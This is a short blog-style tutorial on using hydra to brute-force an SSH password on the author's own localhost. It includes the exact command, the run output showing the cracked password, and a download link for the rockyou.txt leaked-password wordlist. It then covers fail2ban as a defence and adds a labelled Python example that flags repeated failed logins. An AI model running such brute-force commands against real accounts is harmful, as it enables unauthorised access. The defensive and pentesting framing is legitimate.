The hydra brute forcing program allows a user to attack a login by trying many passwords until the correct login information is discovered. I have tried this on localhost and I managed to crack the password for my SSH login on my laptop. I used rockyou.txt downloaded from this website and I had to add my password to this file so that it would be found. Using as large a wordlist as you can is a good idea. This was the command used:
hydra -t 5 -V -f -l jason -P rockyou.txt localhost ssh
This allowed me to crack the SSH password in no time at all.
jason@darkstar:~/Downloads$ hydra -t 5 -V -f -l jason -P rockyou.txt localhost ssh
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-07 14:38:32
[DATA] max 5 tasks per 1 server, overall 5 tasks, 14344401 login tries (l:1/p:14344401), ~573776 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "jason" - pass "123456" - 1 of 14344401 [child 0]
[ATTEMPT] target localhost - login "jason" - pass "12345" - 2 of 14344401 [child 1]
[ATTEMPT] target localhost - login "jason" - pass "302c64&*(" - 3 of 14344401 [child 2]
[ATTEMPT] target localhost - login "jason" - pass "ff302c64FFG" - 4 of 14344401 [child 3]
[ATTEMPT] target localhost - login "jason" - pass "302c64&*(FFG" - 5 of 14344401 [child 4]
[22][ssh] host: 127.0.0.1 login: jason password: 302c64&*(
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-07 14:38:34
This is therefore a good way to test SSH security. But the use of SSH host keys would make this harder. If fail2ban was installed and configured, then this would negate the brute force attacks by blocking repeat offenders in iptables. This is a valid tool for pentesting though.
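The "blocking repeat offenders" idea mentioned above comes down to counting failed logins per source address inside a time window. The following is an added example, not code from the original post or from fail2ban itself: the log lines are constructed, and the function name find_offenders, its maxretry/findtime parameters (named after fail2ban's jail options) and the year default are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth log lines (syslog format), not taken from the post.
SAMPLE_LOG = """\
Aug  7 14:00:00 darkstar sshd[4001]: Failed password for jason from 192.0.2.15 port 50110 ssh2
Aug  7 14:20:00 darkstar sshd[4050]: Failed password for jason from 192.0.2.15 port 50544 ssh2
Aug  7 14:38:32 darkstar sshd[4101]: Failed password for jason from 203.0.113.7 port 40001 ssh2
Aug  7 14:38:32 darkstar sshd[4102]: Failed password for jason from 203.0.113.7 port 40002 ssh2
Aug  7 14:38:33 darkstar sshd[4103]: Failed password for invalid user admin from 203.0.113.7 port 40003 ssh2
Aug  7 14:38:33 darkstar sshd[4104]: Failed password for jason from 203.0.113.7 port 40004 ssh2
Aug  7 14:38:34 darkstar sshd[4105]: Failed password for jason from 203.0.113.7 port 40005 ssh2
Aug  7 14:38:34 darkstar sshd[4106]: Accepted password for jason from 203.0.113.7 port 40006 ssh2
"""

# Matches failures for both existing and non-existent ("invalid user") accounts.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>\S+) port \d+"
)


def find_offenders(log_text, maxretry=5, findtime=600, year=2015):
    """Return {ip: time of the failure that reached maxretry within findtime s}.

    Syslog timestamps carry no year, so one is assumed via the `year` argument.
    """
    window = timedelta(seconds=findtime)
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    offenders = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # successful logins and other lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window: # drop failures that fell out of the window
            q.popleft()
        if len(q) >= maxretry and m["ip"] not in offenders:
            offenders[m["ip"]] = ts   # the point at which a ban would start
    return offenders


if __name__ == "__main__":
    for ip, when in find_offenders(SAMPLE_LOG).items():
        print(f"{ip} reached the failure threshold at {when}")
```

With the defaults, the five rapid failures from one address (the pattern a 5-task run like the one above leaves in the log) are flagged, while two failures twenty minutes apart from another address are not.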
Download rockyou.txt: https://github.com/praetorian-inc/Hob0Rules/raw/master/wordlists/rockyou.txt.gz.
It is available in Kali Linux under /usr/share/wordlists, but I will upload it to my website if you wish.
Can you upload rockyou.txt somewhere? It is unavailable from that site…